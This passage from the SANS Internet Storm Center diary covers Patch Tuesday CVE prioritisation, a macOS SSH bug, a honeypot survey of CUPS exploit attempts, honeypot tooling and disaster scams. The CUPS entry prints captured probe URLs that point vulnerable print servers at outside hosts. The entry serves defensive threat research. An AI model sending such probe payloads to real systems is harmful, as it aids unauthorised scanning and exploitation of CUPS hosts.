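%%cve:2024-43572%% Yes Yes - - Important 7.8 7.2
Open Source Curl Remote Code Execution Vulnerability
%%cve:2024-6197%% Yes No - - Important 8.8 7.7
Windows MSHTML Platform Spoofing Vulnerability
%%cve:2024-43573%% Yes Yes - - Moderate 6.5 6.0
Windows Netlogon Elevation of Privilege Vulnerability
%%cve:2024-38124%% No No - - Important 9.0 7.8
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2024-38261%% No No - - Important 7.8 6.8
%%cve:2024-43608%% No No - - Important 8.8 7.7
Winlogon Elevation of Privilege Vulnerability
%%cve:2024-43583%% Yes No - - Important 7.8 6.8
"""

# One CVE row: marker, Disclosed, Exploited, two exploitability indexes, severity,
# then optional base/temporal scores (the Chromium rows carry none).
ROW_RE = re.compile(
    r"^%%cve:(\d{4}-\d+)%%\s+(Yes|No)\s+(Yes|No)\s+(\S+)\s+(\S+)\s+(\S+)"
    r"(?:\s+(\d+\.\d+)\s+(\d+\.\d+))?$"
)


@dataclass
class Advisory:
    cve: str
    description: str
    disclosed: bool
    exploited: bool
    severity: str
    base: Optional[float]
    temporal: Optional[float]


def parse_table(text):
    """Any line that is not a CVE row becomes the title of the rows after it,
    which is how the flat layout encodes one description for several CVEs."""
    advisories, title = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m is None:
            title = line
            continue
        cve, disc, expl, _old, _cur, sev, base, temp = m.groups()
        advisories.append(Advisory(cve, title, disc == "Yes", expl == "Yes", sev,
                                   float(base) if base else None,
                                   float(temp) if temp else None))
    return advisories


def priority(a):
    # Tuple compares left to right: in-the-wild exploitation outranks everything.
    return (a.exploited, a.disclosed, a.severity == "Critical", a.base or 0.0)


def prioritize(advisories):
    return sorted(advisories, key=priority, reverse=True)


def summarize(advisories):
    return {
        "total": len(advisories),
        "exploited": sum(a.exploited for a in advisories),
        "disclosed": sum(a.disclosed for a in advisories),
        "critical": sum(a.severity == "Critical" for a in advisories),
        "unscored": sum(a.base is None for a in advisories),
    }


if __name__ == "__main__":
    ranked = prioritize(parse_table(TABLE_SAMPLE))
    print(summarize(ranked))
    for a in ranked:
        flags = ("X" if a.exploited else "-") + ("D" if a.disclosed else "-")
        print(f"{flags} {a.severity:9} {a.base or 0:4} CVE-{a.cve}  {a.description}")
```

Feed it the complete table and the top of the list is what to schedule first; rows without a score (the Chromium entries) sink to the bottom rather than breaking the sort.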

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Published: 2024-10-07

macOS Sequoia: System/Network Admins, Hold On!

It's always tempting to install the latest releases of your preferred software and operating systems. After all, that's the message we pass to our beloved users: "Patch, patch, and patch again!". Last week, I was teaching for SANS and decided not to upgrade my MacBook to macOS 15.0 (Sequoia). Today, I had nothing critical scheduled and made the big jump. Upgrading the operating system is always stressful but everything ran smoothly. So far so good...

Later, I started to do my regular geek tasks and connected to several SSH hosts. After a random amount of time, I noticed the following error for many connections:

ssh_dispatch_run_fatal: Connection to x.x.x.x port 22: Connection corrupted

This happened multiple times. I started to google for some users' feedback and experiences. It seems to be a problem faced by many people. What I've read:

  • It happens randomly
  • It affects IPv4 / IPv6
  • Not related to an SSH client (term, iTerm2, same)
  • People who upgraded to 15.0.1 have less frequent disconnections but the problem is not solved yet
  • Some recommendations (worked for some users)
    • Disable the macOS firewall
    • Turn off "Limit IP address tracking"
    • Disable the private (rotating) Wi-Fi MAC address
    • Disable tools like LittleSnitch

There is no "magic recipe" to fix the issue. On my Mac, disabling the address tracking did the job. I've now had an SSH session open for 2h+.

Many forums are covering this topic. The most complete one I found is on the Apple support forum[1]. In conclusion, if SSH is a critical protocol for you, maybe hold on before upgrading your macOS.

Tip: If you need to SSH to a host, be sure to start your shell in a "screen" (or Byobu, ...) session[2] so you don't lose your work.

[1] https://discussions.apple.com/thread/255761702?sortBy=rank&page=1
[2] https://ss64.com/bash/screen.html

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant

Published: 2024-10-04

Survey of CUPS exploit attempts

It is about a week since the release of the four CUPS remote code execution vulnerabilities. After the vulnerabilities became known, I configured one of our honeypots that watches a larger set of IPs to specifically collect UDP packets to port 631. Here is a quick summary of the results.

We do see plenty of scanning to enumerate vulnerable systems, but at this point, no evidence of actual exploitation. But the honeypot is not responding to these requests, so we may be missing post-recon attempts to exploit the vulnerability.

Top URLs

http://192.34.63.88:5674/printers/securitytest3/

The website is down now, but used to show a message that this is a scan to evaluate systems for research purposes. We do not have a prior history from this IP address.

http://194.113.74.187:631/printers/amongus

Also no longer responding. The IP address is associated with security researcher Bill Demirkapi.

http://80.94.95.85:65000/printers/YmVuaWduYmUK "location_field" "info_field"

The string at the end of the URL decoded to "benignbe". The IP address was first seen last August scanning for various ports. The URL is no longer responding.

http://34.176.139.243/printers/YmVuaWducHJpbnRlcnMK "location_field" "info_field"

Note the similar base64 encoded string. This one decoded to "benignprinters". 

http://t828r8qoegavzdeaqtn5jd9umlsdg34s.oastify.com/printers/research_cups_if_we_find_you_are_vulnerable_we_will_let_you_know_via_responsible_disclosure

The URL hopefully identifies the purpose of the scan correctly :) . Oastify.com is used by the Burp Collaborator server.

http://172.214.128.90:65000/printers/YmVuaWduYmUK "location_field" "info_field"

Another "benignbe" URL. Interestingly, it is a Microsoft/GitHub IP address.

http://87.236.176.146:631/classes/2ef46bd9-ae8f4743 (and similar URLs with varying random end)

This IP is associated with internet-measurement.com.

So far, I only saw two "ipp" URLs:

ipp://146.70.100.229:80/printers/ "XXlocation" "XXinfo" "XXmake-and-model"

and 

ipp://199.247.0.94:631/printers/test

I will try to set up some automated responses soon to get a bit more detail.
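Classifying these captures by hand (which host, which port, whether the printer name is a base64 tag, whether the host is an out-of-band callback domain) gets old after the first dozen. The script below is an added example, not the honeypot's own code; it takes the URL plus quoted attribute fields as they appear above, one request per line, and returns a record per request plus a summary. The sample is constructed from the URLs listed in this diary, strict base64 validation keeps names like "test" or "amongus" from being mis-decoded, and treating a missing port as 631 is my assumption.

```python
import base64
import binascii
import shlex
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample: the printer URLs listed above, one captured request per
# line, with the quoted attribute fields that followed some of them.
OBSERVED = """\
http://192.34.63.88:5674/printers/securitytest3/
http://194.113.74.187:631/printers/amongus
http://80.94.95.85:65000/printers/YmVuaWduYmUK "location_field" "info_field"
http://34.176.139.243/printers/YmVuaWducHJpbnRlcnMK "location_field" "info_field"
http://t828r8qoegavzdeaqtn5jd9umlsdg34s.oastify.com/printers/research_cups_if_we_find_you_are_vulnerable_we_will_let_you_know_via_responsible_disclosure
http://172.214.128.90:65000/printers/YmVuaWduYmUK "location_field" "info_field"
http://87.236.176.146:631/classes/2ef46bd9-ae8f4743
ipp://146.70.100.229:80/printers/ "XXlocation" "XXinfo" "XXmake-and-model"
ipp://199.247.0.94:631/printers/test
"""

# Domains that out-of-band testing services hand out for callbacks (oastify.com
# is Burp Collaborator's, as noted in the diary).
CALLBACK_DOMAINS = ("oastify.com",)


def decode_printer_name(segment):
    """Return the plaintext if the name is base64 wrapping printable ASCII,
    else None. Strict validation rejects names that merely look base64-ish."""
    if not segment or len(segment) % 4:
        return None
    try:
        text = base64.b64decode(segment, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    text = text.rstrip("\n")
    return text if text and text.isprintable() else None


def parse_request(line):
    """Split the URL from the quoted attribute fields and classify it."""
    fields = shlex.split(line)
    url = urlsplit(fields[0])
    parts = [p for p in url.path.split("/") if p]
    name = parts[1] if len(parts) > 1 and parts[0] in ("printers", "classes") else ""
    return {
        "scheme": url.scheme,
        "host": url.hostname,
        "port": url.port or 631,  # assumption: no explicit port means the IPP default
        "kind": parts[0] if parts else "",
        "name": name,
        "decoded": decode_printer_name(name),
        "attrs": fields[1:],
        "callback": url.hostname.endswith(CALLBACK_DOMAINS),
    }


def analyze(text):
    records = [parse_request(line) for line in text.splitlines() if line.strip()]
    summary = {
        "total": len(records),
        "by_host": Counter(r["host"] for r in records),
        "by_decoded_name": Counter(r["decoded"] for r in records if r["decoded"]),
        "callbacks": [r["host"] for r in records if r["callback"]],
        "ipp": sum(r["scheme"] == "ipp" for r in records),
        "nonstandard_ports": sorted({r["port"] for r in records if r["port"] != 631}),
    }
    return records, summary


if __name__ == "__main__":
    recs, summ = analyze(OBSERVED)
    for r in recs:
        tag = r["decoded"] or ("callback" if r["callback"] else "")
        print(f"{r['scheme']}://{r['host']}:{r['port']} {r['kind']}/{r['name']}  {tag}")
    print(summ)
```

The decoded-name counter is what links the 80.94.95.85 and 172.214.128.90 requests as one campaign despite different sources, which is the kind of pivot a responding honeypot would let you confirm with the follow-up traffic.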

 

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

Published: 2024-10-03

Kickstart Your DShield Honeypot [Guest Diary]

[This is a Guest Diary by Joshua Gilman, an ISC intern as part of the SANS.edu BACS program]

Introduction

Setting up a DShield honeypot is just the beginning. The real challenge lies in configuring all the necessary post-installation settings, which can be tedious when deploying multiple honeypots. Drawing from personal experience and valuable feedback from past interns at the Internet Storm Center (ISC), I developed DShieldKickStarter to automate this often repetitive and time-consuming process.

What is DShieldKickStarter?

DShieldKickStarter is not a honeypot deployment tool. Instead, it’s a post-installation configuration script designed to streamline the setup of a honeypot environment after the DShield honeypot software has been installed. The script ensures that honeypots run efficiently with minimal manual effort by automating essential tasks such as setting up log backups, PCAP capture, and installing optional analysis tools.

Key Features of DShieldKickStarter

•    Automated Log Backups: The script organizes, compresses, and password-protects honeypot logs to prevent accidental execution of malicious files.
•    PCAP Capture Setup: Using tcpdump, it captures network traffic while excluding specific ports, ensuring relevant data is logged.
•    Optional Tool Installation: Cowrieprocessor and JSON-Log-Country are included as optional tools. Both were invaluable during my internship for streamlining data analysis.
•    Helpful for Multiple Honeypots: This script is handy when managing several honeypots. It saves time by automating repetitive setup tasks.

Step-by-Step Breakdown

The script automates several critical tasks:
1. Creating Directories and Setting Permissions
   Ensures the necessary directory structures for logs, backups, and PCAP data are in place, with proper permissions to secure sensitive files.
2. Installing Required Packages
   Installs essential tools such as tcpdump, git, and python3-pip, streamlining the log and packet capture setup.
3. Configuring Log Rotation and Backups
   Automatically rotates logs and stores them with password protection. PCAP files and honeypot logs are archived daily, and older backups are cleaned up to save space.
4. Automating PCAP Capture
   Sets up tcpdump to capture network traffic, excluding predefined ports so that only relevant traffic is recorded. The process is automated via cron jobs.
5. Optional Tool Integration
   The script optionally installs cowrieprocessor and JSON-Log-Country, two tools that were extremely helpful during my internship. These streamline log processing and help categorize attack data for further analysis.
6. SCP Option for Off-Sensor Backup
   If enabled, the script supports SCP transfers to a remote server, automating the secure transfer of backups for off-sensor storage.

Who Benefits from This?

•    ISC Handlers and Interns: This tool provides a streamlined process for post-installation setup, allowing for faster honeypot deployment and data collection.
•    Cybersecurity Professionals: This tool's time-saving features can benefit anyone interested in setting up a DShield honeypot and contributing to threat intelligence efforts.

Tool Showcase

1. CowrieProcessor

Description

CowrieProcessor is a Python tool designed to process and summarize Cowrie logs, allowing for more accessible and detailed analysis. Cowrie logs can contain overwhelming data as they track every interaction with the honeypot. CowrieProcessor condenses this data into a readable format, focusing on crucial elements like session details, IP addresses, commands entered by attackers, and malicious files downloaded during the session.

Usage and Benefits

The tool automates the parsing of Cowrie logs, providing a summary that includes key metrics such as session duration, attacker IPs, and the commands used during each attack. This is useful for quickly understanding attacker behavior without sifting through massive raw log files. With this, security teams can focus on actionable insights, such as blocking specific IPs or analyzing downloaded malware.

Screenshot Explanation

In the attached screenshot, CowrieProcessor provides a detailed view of a session from an attack on the honeypot. It shows session details, commands attempted by the attacker, and files downloaded, such as the malicious authorized_keys file. The easy-to-read output from CowrieProcessor highlights the attack flow, giving you insight into the malicious actor’s intentions.


CowrieProcessor output showing session details and malicious activities detected by the honeypot.

DShield SIEM (ELK)

Description

While DShield SIEM (ELK) is not included in the script, it is crucial in further analysis and data visualization for honeypots. ELK (Elastic Stack) enables the collection, processing, and real-time visualization of honeypot data. It provides a centralized platform to track attacker behavior, detect patterns, and generate insights through interactive dashboards.

Usage and Benefits

Using ELK, you can monitor key metrics such as the most frequent attacker IPs, session types, and the commands attackers use. ELK dashboards also provide the ability to create custom queries using Kibana Query Language (KQL), which allows you to filter logs by specific attributes like failed logins, session durations, or malicious file downloads.


ELK dashboard showing attack data, top IP addresses, session activity, and trends over time.

Screenshot Explanation

The attached screenshot shows a detailed ELK dashboard summarizing honeypot data. On the left side, the "Top 50 IP" table displays the most active attacking IPs, while the center pie charts break down the types of logs (honeypot, webhoneypot, etc.) and session activity. The bar chart on the right visualizes Cowrie activity over time, helping analysts track attack patterns. KQL can filter this data even further, focusing on specific attacks or malicious behaviors.

KQL (Kibana Query Language)

One of the standout features of ELK is the ability to leverage KQL for deep-dive investigations. For instance, if you want to search for all failed login attempts, you can use a KQL query like:
event.outcome: "login.failed"

This query will instantly filter your logs, allowing you to pinpoint where and when login attempts failed. Another useful query might be filtering by source IP to track all actions from a particular attacker:
source.ip: "45.148.10.242"

With KQL, you can quickly analyze data across large volumes of logs, making it easy to detect anomalies, potential threats, or patterns in attacker behavior.

[1] https://github.com/DShield-ISC/dshield
[2] https://github.com/iamjoshgilman/DShieldKickStarter
[3] https://github.com/jslagrew/cowrieprocessor
[4] https://github.com/justin-leibach/JSON-Log-Country
[5] https://github.com/bruneaug/DShield-SIEM
[6] https://www.elastic.co/guide/en/kibana/current/kuery-query.html
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
-----------
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2024-10-02

Security related Docker containers

Over the last 9 months or so, I've been putting together some docker containers that I find useful in my day-to-day malware analysis and forensicating. I have been putting them up on hub.docker.com and decided I might as well let others know they were there. In a couple of cases, I just found it easier to create a docker container than to try to remember to switch in and out of a Python virtualenv. In a couple of other cases, it avoids issues I've had with conflicting versions of installed packages. In every case, I'm tracking new releases so I can update my containers when new releases come out, and I usually do so within a couple of days of the new release. The ones that I have up at the moment are the following:

clausing/flare-floss

clausing/capa

clausing/hayabusa

clausing/takajo

clausing/chainsaw

clausing/yara

clausing/uac

clausing/dfir-unfurl

The USAGE portion of each page should give enough info on how to run them (and what directories to map into the container). Hopefully, some of the rest of you will find these useful.


---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu


Published: 2024-10-01

Hurricane Helene Aftermath - Cyber Security Awareness Month

For a few years now, October has been "National Cyber Security Awareness Month". This year, it is a good opportunity for a refresher on some scams that tend to happen around disasters like Hurricane Helene. The bigger the disaster, the more attractive it is to scammers.

Fake Donation Sites

Hurricane Katrina was the first event that triggered many fake donation websites. Since then, the number of fake donation websites has decreased somewhat, partly due to law enforcement attention and hopefully due to people becoming more aware of these scams. These scams either pretend to be a new charity/group attempting to help or impersonate an existing reputable charity. People in affected areas need help. Please only donate to groups you are familiar with and who were active before the event.

AI Social Media Posts

I believe these posts are mostly created to gain social media followers, maybe with the intent to later reel them into some scam. They often post dramatic images created with AI tools or copied from legitimate accounts. Some may just be interested in the monetization schemes social media and video sites are participating in. Do not amplify these accounts. Strictly speaking, they are not "fake news," but legitimate news sources who go out to take pictures and gather information need exposure more than these fake accounts. Often, the fake accounts will at least exaggerate the impact of the event and, in some cases, reduce the credibility of legitimate recovery efforts.

Malware

Attackers may use the event as a pretense to trick victims into opening attachments. In the past, we have seen e-mails and websites that spread malware claiming to include videos or images of the event. These attachments turn out to be executables installing malware.

Fake Assistance Scams

In the aftermath of a disaster, organizations often provide financial aid through loans. Scammers will apply for these loans using stolen identities traded online. It may take several months for the victim to become aware of this, often only when they face a request to repay the loan. Sadly, there is not much, if anything, you can do to protect yourself from these scams. The intent of the assistance is to be quick and unbureaucratic and to "sort things out later". You may have to prove that someone else used your information to apply for the loan.

"Grandparent Scam"

In this scam, a caller will pretend to be a relative or close friend, asking for money. These scams have improved because they can often identify individuals in the disaster area and use them as a pretense to extort money. The caller may claim to be the individual (often they use SMS or other text messaging services), or they may claim to represent a police department or a hospital. Do not respond to any demands for money. Notify your local police department. If you are concerned, try to reach out to the agency calling you using a published number (note that Google listings can be fake). Due to the conditions in affected areas, the local authorities may be unable to respond. Your local law enforcement agency may be able to assist. They often have a published "non-emergency" number you can use instead of 911. Individuals in the affected area may not be reachable due to spotty power and cell service availability.

Final Word

Please let us know if we missed anything. A final word on some disaster preparedness items with an "IT flavor":

Broken high voltage power line wire touching cable TV and phone lines.

  1. Have a plan to get out, and if you can get out: get out. You should not stay in the affected area unless you are part of the recovery effort.
  2. Cellular networks fail. Cellular networks tend to work pretty well during smaller disasters, but they need power, towers, and other infrastructure, which will fail in large-scale disasters. Satellite connectivity quickly becomes your only viable option (if you have power). If you have a phone with satellite emergency calling (for example, a recent iPhone), they offer a "demo mode" to familiarize you with the feature.
  3. If you are lucky enough to already have a Starlink setup, bring the antenna inside before the storm and disconnect the equipment from power to avoid spikes destroying it.
  4. Disconnect as many electric devices from outlets as possible during a power outage (or before power outages are expected). Power outages often come with power spikes and other irregular power events that can destroy sensitive electronics. Do not plug them back in until power is restored and stable.
  5. Even a downed phone or cable TV line can be energized. You may not see the high voltage line that is also down and touches the cable TV line. I took the picture on the right this weekend in my neighborhood of a high-voltage line touching the cable TV and phone line.


---
Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu
Twitter
